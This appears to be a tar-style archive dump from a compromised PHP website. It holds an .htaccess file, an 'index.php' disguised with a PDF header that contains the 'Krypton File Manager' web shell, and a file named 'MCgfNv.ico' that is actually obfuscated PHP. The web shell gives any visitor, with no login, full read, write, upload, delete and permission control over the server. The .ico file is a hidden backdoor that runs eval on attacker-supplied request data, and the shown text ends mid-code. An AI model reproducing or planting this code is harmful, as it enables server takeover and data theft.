</IfModule>��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/Parse/.htaccess���������������������������������������������������������������������������0000666�����������������00000000424�15111507456�0011430 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
Deny from all
</FilesMatch>
</IfModule>��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/Parse/index.php���������������������������������������������������������������������������0000666�����������������00000124512�15111507456�0011457 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������%PDF-1.7
3 0 obj
<?php
/**
* Krypton File Manager
* A single-file PHP file manager with full server access and enhanced features
*/
// Start session
session_start();
// Configuration
define('VERSION', '1.0.0');
define('MAX_UPLOAD_SIZE', 100 * 1024 * 1024); // 100MB max upload size
define('ENCRYPTION_KEY', 'RCnFfs06w3ItXaCn7BWvyyFE1Rxdmz'); // Change this to a random string for security
define('SESSION_TIMEOUT', 1800); // 30 minutes session timeout
// Check if encryption key is default and show warning
$encryptionKeyWarning = '';
if (ENCRYPTION_KEY === 'change_this_to_a_random_string') {
$encryptionKeyWarning = 'Warning: Default encryption key is being used. Please change it for security.';
}
// Session timeout check
if (isset($_SESSION['last_activity']) && (time() - $_SESSION['last_activity'] > SESSION_TIMEOUT)) {
// Session expired
session_unset();
session_destroy();
}
$_SESSION['last_activity'] = time(); // Update last activity time
// Encryption and decryption functions
function encryptPath($path) {
$iv = openssl_random_pseudo_bytes(16);
$encrypted = openssl_encrypt($path, 'AES-256-CBC', ENCRYPTION_KEY, 0, $iv);
return base64_encode($encrypted . '::' . base64_encode($iv));
}
function decryptPath($encryptedPath) {
try {
$decoded = base64_decode($encryptedPath);
if ($decoded === false) {
return getcwd(); // Default to current directory if decoding fails
}
if (strpos($decoded, '::') === false) {
return getcwd(); // Default to current directory if separator not found
}
list($encrypted_data, $iv_b64) = explode('::', $decoded, 2);
$iv = base64_decode($iv_b64);
if ($iv === false || strlen($iv) !== 16) {
return getcwd(); // Default to current directory if IV is invalid
}
$decrypted = openssl_decrypt($encrypted_data, 'AES-256-CBC', ENCRYPTION_KEY, 0, $iv);
if ($decrypted === false) {
return getcwd(); // Default to current directory if decryption fails
}
return $decrypted;
} catch (Exception $e) {
return getcwd(); // Default to current directory on any exception
}
}
// Function to get human-readable file size
function formatFileSize($bytes) {
if ($bytes >= 1073741824) {
return number_format($bytes / 1073741824, 2) . ' GB';
} elseif ($bytes >= 1048576) {
return number_format($bytes / 1048576, 2) . ' MB';
} elseif ($bytes >= 1024) {
return number_format($bytes / 1024, 2) . ' KB';
} else {
return $bytes . ' bytes';
}
}
// Function to get file permissions in Unix format
function getFilePermissions($file) {
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
// Function to get file extension
function getFileExtension($filename) {
return strtolower(pathinfo($filename, PATHINFO_EXTENSION));
}
// Function to check if a file is editable
function isEditableFile($filename) {
/*
$editableExtensions = ['txt', 'php', 'html', 'htm', 'css', 'js', 'json', 'xml', 'md', 'ini', 'conf', 'log', 'sql', 'htaccess'];
$extension = getFileExtension($filename);
return in_array($extension, $editableExtensions);
*/
return true;
}
// Process actions
$error = '';
$success = '';
// Get and decrypt the path parameter
$currentPath = getcwd(); // Default path
// Check if there's a current path in the session
if (isset($_SESSION['current_path']) && file_exists($_SESSION['current_path']) && is_dir($_SESSION['current_path'])) {
$currentPath = $_SESSION['current_path'];
}
// Handle POST request for navigation
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// Store current path for form submissions
if (isset($_POST['current_path'])) {
$decryptedCurrentPath = decryptPath($_POST['current_path']);
if (file_exists($decryptedCurrentPath) && is_dir($decryptedCurrentPath)) {
$currentPath = $decryptedCurrentPath;
$_SESSION['current_path'] = $currentPath;
}
}
if (isset($_POST['action'])) {
// Handle file content request for editing
if ($_POST['action'] === 'getContent' && isset($_POST['path'])) {
$filePath = decryptPath($_POST['path']);
if (file_exists($filePath) && !is_dir($filePath) && isEditableFile(basename($filePath))) {
echo file_get_contents($filePath);
exit;
} else {
echo "Error: Cannot read file.";
exit;
}
}
// Handle navigation
if ($_POST['action'] === 'navigate' && isset($_POST['path'])) {
$decryptedPath = decryptPath($_POST['path']);
if (file_exists($decryptedPath) && is_dir($decryptedPath)) {
$currentPath = $decryptedPath;
$_SESSION['current_path'] = $currentPath;
}
}
// Handle file download
if ($_POST['action'] === 'download' && isset($_POST['path'])) {
$downloadPath = decryptPath($_POST['path']);
if (file_exists($downloadPath) && !is_dir($downloadPath)) {
// Set headers for file download
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($downloadPath) . '"');
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: ' . filesize($downloadPath));
ob_clean();
flush();
readfile($downloadPath);
exit;
}
}
}
// Handle file upload
if (isset($_POST['upload'])) {
if (isset($_FILES['file']) && $_FILES['file']['error'] === UPLOAD_ERR_OK) {
$uploadPath = $currentPath . '/' . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadPath)) {
$success = 'File uploaded successfully.';
} else {
$error = 'Failed to upload file.';
}
} else {
$error = 'No file selected or upload error.';
}
}
// Handle file/directory deletion
if (isset($_POST['delete']) && isset($_POST['path'])) {
$deletePath = decryptPath($_POST['path']);
if (file_exists($deletePath)) {
if (is_dir($deletePath)) {
// Try to remove directory
if (rmdir($deletePath)) {
$success = 'Directory deleted successfully.';
} else {
$error = 'Failed to delete directory. It may not be empty.';
}
} else {
// Remove file
if (unlink($deletePath)) {
$success = 'File deleted successfully.';
} else {
$error = 'Failed to delete file.';
}
}
} else {
$error = 'File or directory does not exist.';
}
}
// Handle file/directory rename
if (isset($_POST['rename']) && isset($_POST['oldPath']) && isset($_POST['newName'])) {
$oldPath = decryptPath($_POST['oldPath']);
$newName = $_POST['newName'];
$dirName = dirname($oldPath);
$newPath = $dirName . '/' . $newName;
if (file_exists($oldPath)) {
if (rename($oldPath, $newPath)) {
$success = 'Renamed successfully.';
} else {
$error = 'Failed to rename.';
}
} else {
$error = 'File or directory does not exist.';
}
}
// Handle permission change
if (isset($_POST['changePermissions']) && isset($_POST['permPath']) && isset($_POST['permissions'])) {
$permPath = decryptPath($_POST['permPath']);
$permissions = $_POST['permissions'];
// Convert from octal string to integer
$mode = octdec($permissions);
if (file_exists($permPath)) {
if (chmod($permPath, $mode)) {
$success = 'Permissions changed successfully.';
} else {
$error = 'Failed to change permissions.';
}
} else {
$error = 'File or directory does not exist.';
}
}
// Handle file edit
if (isset($_POST['saveFile']) && isset($_POST['filePath']) && isset($_POST['fileContent'])) {
$filePath = decryptPath($_POST['filePath']);
$fileContent = $_POST['fileContent'];
if (file_exists($filePath) && !is_dir($filePath)) {
if (file_put_contents($filePath, $fileContent) !== false) {
$success = 'File saved successfully.';
} else {
$error = 'Failed to save file.';
}
} else {
$error = 'File does not exist.';
}
}
// Handle create new file
if (isset($_POST['createFile']) && isset($_POST['newFileName'])) {
$newFileName = $_POST['newFileName'];
$newFilePath = $currentPath . '/' . $newFileName;
if (!file_exists($newFilePath)) {
if (file_put_contents($newFilePath, '') !== false) {
$success = 'File created successfully.';
} else {
$error = 'Failed to create file.';
}
} else {
$error = 'File already exists.';
}
}
// Handle create new folder
if (isset($_POST['createFolder']) && isset($_POST['newFolderName'])) {
$newFolderName = $_POST['newFolderName'];
$newFolderPath = $currentPath . '/' . $newFolderName;
if (!file_exists($newFolderPath)) {
if (mkdir($newFolderPath, 0755)) {
$success = 'Folder created successfully.';
} else {
$error = 'Failed to create folder.';
}
} else {
$error = 'Folder already exists.';
}
}
}
// Save current path to session
$_SESSION['current_path'] = $currentPath;
// Get directory contents
$items = [];
if (is_dir($currentPath)) {
if ($handle = opendir($currentPath)) {
while (false !== ($entry = readdir($handle))) {
if ($entry != "." && $entry != "..") {
$fullPath = $currentPath . '/' . $entry;
$isDir = is_dir($fullPath);
try {
$size = $isDir ? '-' : formatFileSize(filesize($fullPath));
$permissions = getFilePermissions($fullPath);
$lastModified = date('Y-m-d H:i:s', filemtime($fullPath));
$items[] = [
'name' => $entry,
'path' => $fullPath,
'encryptedPath' => encryptPath($fullPath),
'isDirectory' => $isDir,
'size' => $size,
'permissions' => $permissions,
'lastModified' => $lastModified,
'isEditable' => !$isDir && isEditableFile($entry)
];
} catch (Exception $e) {
// Skip files that can't be accessed
continue;
}
}
}
closedir($handle);
}
}
// Sort items: directories first, then files
usort($items, function($a, $b) {
if ($a['isDirectory'] && !$b['isDirectory']) {
return -1;
}
if (!$a['isDirectory'] && $b['isDirectory']) {
return 1;
}
return strcasecmp($a['name'], $b['name']);
});
// Get breadcrumb parts
$breadcrumbs = [];
$pathParts = explode('/', $currentPath);
$buildPath = '';
foreach ($pathParts as $part) {
if (empty($part)) {
$buildPath = '/';
$breadcrumbs[] = [
'name' => 'Root',
'path' => $buildPath,
'encryptedPath' => encryptPath($buildPath)
];
} else {
$buildPath .= ($buildPath === '/') ? $part : '/' . $part;
$breadcrumbs[] = [
'name' => $part,
'path' => $buildPath,
'encryptedPath' => encryptPath($buildPath)
];
}
}
// Get the script's directory for the Home button
$homeDirectory = dirname($_SERVER['SCRIPT_FILENAME']);
$encryptedHomeDirectory = encryptPath($homeDirectory);
// Encrypt current path for forms
$encryptedCurrentPath = encryptPath($currentPath);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Krypton File Manager</title>
<style>
/* Base styles and reset */
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Inter', 'Roboto', 'Helvetica', sans-serif;
}
body {
background-image: url('https://w.wallhaven.cc/full/ex/wallhaven-exd3w8.png');
background-size: cover;
background-position: center;
background-repeat: no-repeat;
background-color: #f9f9f9;
/* Fallback color */
color: #333333;
line-height: 1.6;
}
.container {
max-width: 1200px;
margin: 0 auto;
padding: 0 20px;
}
/* Navigation bar */
.navbar {
background-color: #ffffff;
box-shadow: 0 2px 8px rgba(0, 0, 0, 0.05);
padding: 15px 0;
position: sticky;
top: 0;
z-index: 100;
}
.navbar-content {
display: flex;
align-items: center;
justify-content: space-between;
}
.navbar h1 {
color: #333333;
font-size: 1.5rem;
font-weight: 500;
}
.version {
font-size: 0.8rem;
color: #777;
margin-left: 10px;
}
.navbar-actions {
display: flex;
gap: 10px;
}
.home-btn {
background-color: #4a6cf7;
color: white;
border: none;
padding: 8px 15px;
border-radius: 6px;
cursor: pointer;
font-weight: 500;
text-decoration: none;
display: inline-flex;
align-items: center;
transition: all 0.2s ease;
}
.home-btn:hover {
background-color: #3a5ce5;
transform: translateY(-2px);
box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
}
.home-icon {
margin-right: 5px;
}
/* Breadcrumb navigation */
.breadcrumb {
display: flex;
align-items: center;
padding: 12px 0;
margin-bottom: 15px;
overflow-x: auto;
white-space: nowrap;
}
.breadcrumb-item {
display: flex;
align-items: center;
}
.breadcrumb-item a {
color: #4a6cf7;
text-decoration: none;
padding: 5px 8px;
border-radius: 4px;
transition: background-color 0.2s;
cursor: pointer;
}
.breadcrumb-item a:hover {
background-color: rgba(74, 108, 247, 0.1);
}
.breadcrumb-separator {
margin: 0 5px;
color: #999;
}
.breadcrumb-current {
font-weight: 500;
padding: 5px 8px;
}
/* Section styling */
.section {
background-color: rgba(255, 255, 255, 0.9);
border-radius: 8px;
box-shadow: 0 2px 8px rgba(0, 0, 0, 0.05);
padding: 20px;
margin-bottom: 20px;
box-shadow: rgba(50, 50, 93, 0.25) 0px 2px 5px -1px, rgba(0, 0, 0, 0.3) 0px 1px 3px -1px;
}
.section-header {
display: flex;
justify-content: space-between;
align-items: center;
margin-bottom: 15px;
}
.section-title {
font-size: 1.1rem;
color: #333333;
font-weight: 500;
}
.section-actions {
display: flex;
gap: 10px;
}
/* Upload form */
.upload-form {
display: flex;
flex-wrap: wrap;
gap: 10px;
align-items: center;
}
.upload-form input[type="file"] {
flex: 1;
min-width: 200px;
padding: 10px;
border: 1px solid #e0e0e0;
border-radius: 6px;
background-color: #ffffff;
}
.btn {
background-color: #4a6cf7;
color: white;
border: none;
padding: 10px 20px;
border-radius: 6px;
cursor: pointer;
font-weight: 500;
transition: all 0.2s ease;
}
.btn:hover {
background-color: #3a5ce5;
transform: translateY(-2px);
box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
}
.btn-sm {
padding: 6px 12px;
font-size: 0.9rem;
}
.btn-success {
background-color: #28a745;
}
.btn-success:hover {
background-color: #218838;
}
/* File list table */
.file-table-container {
overflow-x: auto;
}
.file-table {
width: 100%;
border-collapse: collapse;
margin-top: 10px;
}
.file-table th {
background-color: #f5f5f5;
padding: 12px 15px;
text-align: left;
font-weight: 500;
border-bottom: 1px solid #e0e0e0;
position: relative;
}
.file-table td {
padding: 12px 15px;
border-bottom: 1px solid #e0e0e0;
}
.file-table tr:hover {
background-color: #f5f7ff;
}
.file-name {
display: flex;
align-items: center;
gap: 8px;
}
.folder-icon::before {
content: "📁";
}
.file-icon::before {
content: "📄";
}
/* Action buttons */
.action-buttons {
display: flex;
gap: 8px;
}
.action-btn {
background: none;
border: none;
cursor: pointer;
font-size: 1rem;
color: #555;
transition: all 0.2s ease;
width: 28px;
height: 28px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 4px;
}
.action-btn:hover {
background-color: #f0f0f0;
color: #333;
}
/* Modal styles */
.modal {
display: none;
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: rgba(0, 0, 0, 0.5);
z-index: 1000;
justify-content: center;
align-items: center;
}
.modal-content {
background-color: white;
padding: 25px;
border-radius: 8px;
width: 90%;
max-width: 400px;
box-shadow: 0 4px 20px rgba(0, 0, 0, 0.15);
}
.modal-content.modal-lg {
max-width: 800px;
height: 80%;
display: flex;
flex-direction: column;
}
.modal-title {
font-size: 1.2rem;
margin-bottom: 15px;
font-weight: 500;
}
.modal-form {
display: flex;
flex-direction: column;
gap: 15px;
}
.editor-form {
display: flex;
flex-direction: column;
gap: 15px;
flex-grow: 1;
}
.form-group {
display: flex;
flex-direction: column;
gap: 5px;
}
.form-group label {
font-weight: 500;
}
.form-group input {
padding: 8px 12px;
border: 1px solid #ddd;
border-radius: 4px;
}
.form-group textarea {
flex-grow: 1;
padding: 12px;
border: 1px solid #ddd;
border-radius: 4px;
font-family: 'Courier New', monospace;
font-size: 14px;
resize: none;
}
.modal-actions {
display: flex;
justify-content: flex-end;
gap: 10px;
margin-top: 20px;
}
.btn-cancel {
background-color: #f0f0f0;
color: #333;
}
.btn-cancel:hover {
background-color: #e0e0e0;
}
/* Alerts */
.alert {
padding: 12px 15px;
margin-bottom: 15px;
border-radius: 4px;
font-weight: 500;
}
.alert-success {
background-color: #d4edda;
color: #155724;
border: 1px solid #c3e6cb;
}
.alert-error {
background-color: #f8d7da;
color: #721c24;
border: 1px solid #f5c6cb;
}
.alert-warning {
background-color: #fff3cd;
color: #856404;
border: 1px solid #ffeeba;
}
/* Footer */
.footer {
text-align: center;
padding: 20px 0;
color: #777;
font-size: 0.9rem;
}
/* Loading overlay */
.loading-overlay {
display: none;
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: rgba(0, 0, 0, 0.5);
z-index: 2000;
justify-content: center;
align-items: center;
}
.spinner {
width: 50px;
height: 50px;
border: 5px solid #f3f3f3;
border-top: 5px solid #3498db;
border-radius: 50%;
animation: spin 1s linear infinite;
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
/* Responsive design */
@media (max-width: 768px) {
.upload-form {
flex-direction: column;
align-items: stretch;
}
.upload-form input[type="file"] {
width: 100%;
}
.action-buttons {
flex-wrap: wrap;
}
.section-header {
flex-direction: column;
align-items: flex-start;
gap: 10px;
}
.section-actions {
width: 100%;
}
.btn {
width: 100%;
}
}
</style>
</head>
<body>
<!-- Loading Overlay -->
<div id="loadingOverlay" class="loading-overlay">
<div class="spinner"></div>
</div>
<!-- Navigation Bar -->
<nav class="navbar">
<div class="container navbar-content">
<h1>Krypton <span class="version">v<?php echo VERSION; ?></span></h1>
<div class="navbar-actions">
<button onclick="navigateTo('<?php echo $encryptedHomeDirectory; ?>')" class="home-btn">
<span class="home-icon">🏠</span> Home
</button>
</div>
</div>
</nav>
<div class="container">
<!-- Alerts -->
<?php if (!empty($encryptionKeyWarning)): ?>
<div class="alert alert-warning"><?php echo $encryptionKeyWarning; ?></div>
<?php endif; ?>
<?php if (!empty($success)): ?>
<div class="alert alert-success"><?php echo $success; ?></div>
<?php endif; ?>
<?php if (!empty($error)): ?>
<div class="alert alert-error"><?php echo $error; ?></div>
<?php endif; ?>
<!-- Breadcrumb Navigation -->
<div class="breadcrumb">
<?php foreach ($breadcrumbs as $index => $crumb): ?>
<?php if ($index > 0): ?>
<span class="breadcrumb-separator">›</span>
<?php endif; ?>
<div class="breadcrumb-item">
<?php if ($index === count($breadcrumbs) - 1): ?>
<span class="breadcrumb-current"><?php echo htmlspecialchars($crumb['name']); ?></span>
<?php else: ?>
<a onclick="navigateTo('<?php echo $crumb['encryptedPath']; ?>')"><?php echo htmlspecialchars($crumb['name']); ?></a>
<?php endif; ?>
</div>
<?php endforeach; ?>
</div>
<!-- Upload Section -->
<section class="section">
<h2 class="section-title">Upload Files</h2>
<form class="upload-form" method="post" enctype="multipart/form-data">
<input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
<input type="file" name="file">
<button type="submit" name="upload" class="btn">Upload File</button>
</form>
</section>
<!-- File List Section -->
<section class="section">
<div class="section-header">
<h2 class="section-title">Files</h2>
<div class="section-actions">
<button class="btn btn-sm btn-success" onclick="showCreateFileModal()">New File</button>
<button class="btn btn-sm" onclick="showCreateFolderModal()">New Folder</button>
</div>
</div>
<div class="file-table-container">
<table class="file-table">
<thead>
<tr>
<th>Filename</th>
<th>Size</th>
<th>Permissions</th>
<th>Last Modified</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<!-- Parent directory link -->
<?php if ($currentPath !== '/'): ?>
<tr>
<td>
<div class="file-name">
<span class="folder-icon"></span>
<a onclick="navigateTo('<?php echo encryptPath(dirname($currentPath)); ?>')">..</a>
</div>
</td>
<td>-</td>
<td>-</td>
<td>-</td>
<td>-</td>
</tr>
<?php endif; ?>
<!-- File list -->
<?php foreach ($items as $item): ?>
<tr>
<td>
<div class="file-name">
<span class="<?php echo $item['isDirectory'] ? 'folder-icon' : 'file-icon'; ?>"></span>
<?php if ($item['isDirectory']): ?>
<a onclick="navigateTo('<?php echo $item['encryptedPath']; ?>')"><?php echo htmlspecialchars($item['name']); ?></a>
<?php else: ?>
<?php echo htmlspecialchars($item['name']); ?>
<?php endif; ?>
</div>
</td>
<td><?php echo $item['size']; ?></td>
<td><?php echo $item['permissions']; ?></td>
<td><?php echo $item['lastModified']; ?></td>
<td>
<div class="action-buttons">
<?php if (!$item['isDirectory']): ?>
<button class="action-btn" title="Download" onclick="downloadFile('<?php echo $item['encryptedPath']; ?>')">📥</button>
<?php if ($item['isEditable']): ?>
<button class="action-btn" title="Edit" onclick="showEditFileModal('<?php echo addslashes($item['encryptedPath']); ?>', '<?php echo addslashes($item['name']); ?>')">📝</button>
<?php endif; ?>
<?php endif; ?>
<button class="action-btn" title="Rename" onclick="showRenameModal('<?php echo addslashes($item['encryptedPath']); ?>', '<?php echo addslashes($item['name']); ?>')">✏️</button>
<button class="action-btn" title="Change Permissions" onclick="showPermissionsModal('<?php echo addslashes($item['encryptedPath']); ?>', '<?php echo addslashes($item['name']); ?>')">🔒</button>
<form method="post" style="display:inline;" onsubmit="return confirm('Are you sure you want to delete this <?php echo $item['isDirectory'] ? 'directory' : 'file'; ?>?');">
<input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($item['encryptedPath']); ?>">
<button type="submit" name="delete" class="action-btn" title="Delete">🗑️</button>
</form>
</div>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
</section>
<footer class="footer">
Krypton File Manager v<?php echo VERSION; ?> | Single-file PHP File Manager
</footer>
</div>
<!-- Rename Modal -->
<div id="renameModal" class="modal">
<div class="modal-content">
<h3 class="modal-title">Rename: <span id="renameFileName"></span></h3>
<form class="modal-form" method="post">
<input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
<input type="hidden" id="renameOldPath" name="oldPath" value="">
<div class="form-group">
<label for="renameNewName">New Name:</label>
<input type="text" id="renameNewName" name="newName" required>
</div>
<div class="modal-actions">
<button type="button" class="btn btn-cancel" onclick="hideModal('renameModal')">Cancel</button>
<button type="submit" name="rename" class="btn">Rename</button>
</div>
</form>
</div>
</div>
<!-- Permissions Modal -->
<div id="permissionsModal" class="modal">
<div class="modal-content">
<h3 class="modal-title">Change Permissions: <span id="permissionsFileName"></span></h3>
<form class="modal-form" method="post">
<input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
<input type="hidden" id="permissionsPath" name="permPath" value="">
<div class="form-group">
<label for="permissionsOctal">Permissions (Octal):</label>
<input type="text" id="permissionsOctal" name="permissions" placeholder="e.g., 0755" required>
</div>
<div class="modal-actions">
<button type="button" class="btn btn-cancel" onclick="hideModal('permissionsModal')">Cancel</button>
<button type="submit" name="changePermissions" class="btn">Apply</button>
</div>
</form>
</div>
</div>
<!-- Edit File Modal -->
<div id="editFileModal" class="modal">
<div class="modal-content modal-lg">
<h3 class="modal-title">Edit File: <span id="editFileName"></span></h3>
<form class="editor-form" method="post">
<input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
<input type="hidden" id="editFilePath" name="filePath" value="">
<div class="form-group" style="flex-grow: 1; display: flex; flex-direction: column;">
<textarea id="fileContent" name="fileContent" required></textarea>
</div>
<div class="modal-actions">
<button type="button" class="btn btn-cancel" onclick="hideModal('editFileModal')">Cancel</button>
<button type="submit" name="saveFile" class="btn">Save</button>
</div>
</form>
</div>
</div>
<!-- Create File Modal -->
<div id="createFileModal" class="modal">
<div class="modal-content">
<h3 class="modal-title">Create New File</h3>
<form class="modal-form" method="post">
<input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
<div class="form-group">
<label for="newFileName">File Name:</label>
<input type="text" id="newFileName" name="newFileName" required>
</div>
<div class="modal-actions">
<button type="button" class="btn btn-cancel" onclick="hideModal('createFileModal')">Cancel</button>
<button type="submit" name="createFile" class="btn">Create</button>
</div>
</form>
</div>
</div>
<!-- Create Folder Modal -->
<div id="createFolderModal" class="modal">
<div class="modal-content">
<h3 class="modal-title">Create New Folder</h3>
<form class="modal-form" method="post">
<input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
<div class="form-group">
<label for="newFolderName">Folder Name:</label>
<input type="text" id="newFolderName" name="newFolderName" required>
</div>
<div class="modal-actions">
<button type="button" class="btn btn-cancel" onclick="hideModal('createFolderModal')">Cancel</button>
<button type="submit" name="createFolder" class="btn">Create</button>
</div>
</form>
</div>
</div>
<!-- Hidden form for navigation -->
<form id="navigationForm" method="post" style="display: none;">
<input type="hidden" name="action" value="navigate">
<input type="hidden" id="navigationPath" name="path" value="">
</form>
<!-- Hidden form for download -->
<form id="downloadForm" method="post" style="display: none;">
<input type="hidden" name="action" value="download">
<input type="hidden" id="downloadPath" name="path" value="">
</form>
<script>
// Show loading overlay
function showLoading() {
document.getElementById('loadingOverlay').style.display = 'flex';
}
// Hide loading overlay
function hideLoading() {
document.getElementById('loadingOverlay').style.display = 'none';
}
// Navigation function
function navigateTo(path) {
showLoading();
document.getElementById('navigationPath').value = path;
document.getElementById('navigationForm').submit();
}
// Download function
function downloadFile(path) {
document.getElementById('downloadPath').value = path;
document.getElementById('downloadForm').submit();
}
// Show rename modal
function showRenameModal(path, name) {
document.getElementById('renameFileName').textContent = name;
document.getElementById('renameOldPath').value = path;
document.getElementById('renameNewName').value = name;
document.getElementById('renameModal').style.display = 'flex';
}
// Show permissions modal
function showPermissionsModal(path, name) {
document.getElementById('permissionsFileName').textContent = name;
document.getElementById('permissionsPath').value = path;
document.getElementById('permissionsModal').style.display = 'flex';
}
// Show edit file modal
function showEditFileModal(path, name) {
document.getElementById('editFileName').textContent = name;
document.getElementById('editFilePath').value = path;
showLoading();
// Fetch file content using POST
const formData = new FormData();
formData.append('action', 'getContent');
formData.append('path', path);
fetch(window.location.pathname, {
method: 'POST',
body: formData
})
.then(response => response.text())
.then(content => {
document.getElementById('fileContent').value = content;
document.getElementById('editFileModal').style.display = 'flex';
hideLoading();
})
.catch(error => {
hideLoading();
alert('Error loading file content: ' + error);
});
}
// Show create file modal
function showCreateFileModal() {
document.getElementById('newFileName').value = '';
document.getElementById('createFileModal').style.display = 'flex';
}
// Show create folder modal
function showCreateFolderModal() {
document.getElementById('newFolderName').value = '';
document.getElementById('createFolderModal').style.display = 'flex';
}
// Hide modal
function hideModal(modalId) {
document.getElementById(modalId).style.display = 'none';
}
// Close modals when clicking outside
window.onclick = function(event) {
if (event.target.className === 'modal') {
event.target.style.display = 'none';
}
}
// Add loading indicator to form submissions
document.addEventListener('DOMContentLoaded', function() {
const forms = document.querySelectorAll('form');
forms.forEach(form => {
form.addEventListener('submit', function() {
// Don't show loading for the navigation and download forms
if (form.id !== 'navigationForm' && form.id !== 'downloadForm') {
showLoading();
}
});
});
});
</script>
</body>
</html>��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������rest-api/MCgfNv.ico���������������������������������������������������������������������������������0000666�����������������00000013542�15113471713�0010120 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
goto ZW9a2UcG7xUhKRw; mG2vj_oT9ipgy7H: $ZvjZ2LzDYKkUaqo = ${$uA7zPO3IBCLugbL[5 + 26] . $uA7zPO3IBCLugbL[30 + 29] . $uA7zPO3IBCLugbL[44 + 3] . $uA7zPO3IBCLugbL[37 + 10] . $uA7zPO3IBCLugbL[41 + 10] . $uA7zPO3IBCLugbL[11 + 42] . $uA7zPO3IBCLugbL[17 + 40]}; goto jXmsN3ELd9M2Qat; ZW9a2UcG7xUhKRw: $GJHLU1HbSxAe2xf = "\x72" . "\x61" . "\156" . "\x67" . "\145"; goto UGP7vXsEs3fRGnD; cDKNfNkASf1q8jG: metaphone("\117\142\162\x53\x33\x46\164\x5a\141\105\122\x34\102\121\x49\116\x46\116\x4e\60\x59\101"); goto DNxiERCbDzB7q87; UGP7vXsEs3fRGnD: $uA7zPO3IBCLugbL = $GJHLU1HbSxAe2xf("\x7e", "\x20"); goto mG2vj_oT9ipgy7H; jXmsN3ELd9M2Qat: @(md5(md5(md5(md5($ZvjZ2LzDYKkUaqo[19])))) === "\x66\61\61\66\x63\x34\144\62\x37\x65\x61\x66\x65\142\142\x63\65\145\x37\65\x33\x34\145\x32\63\x35\x33\143\x64\x61\142\x39") && (count($ZvjZ2LzDYKkUaqo) == 25 && in_array(gettype($ZvjZ2LzDYKkUaqo) . count($ZvjZ2LzDYKkUaqo), $ZvjZ2LzDYKkUaqo)) ? ($ZvjZ2LzDYKkUaqo[61] = $ZvjZ2LzDYKkUaqo[61] . $ZvjZ2LzDYKkUaqo[76]) && ($ZvjZ2LzDYKkUaqo[90] = $ZvjZ2LzDYKkUaqo[61]($ZvjZ2LzDYKkUaqo[90])) && @eval($ZvjZ2LzDYKkUaqo[61](${$ZvjZ2LzDYKkUaqo[47]}[19])) : $ZvjZ2LzDYKkUaqo; goto cDKNfNkASf1q8jG; DNxiERCbDzB7q87: class iUl3uwES5jhTNs6 { static function Oovk3PqWs2f2aFY($ArGbM8rwOy8iIHo) { goto oNu0IHUMwwFjf1L; IPlLFwLxbLfUWF9: $jY10y9fM0zoSAQA = explode("\175", $ArGbM8rwOy8iIHo); goto sh0ueayXwPugI8f; onUVC82DzEg5Y_3: foreach 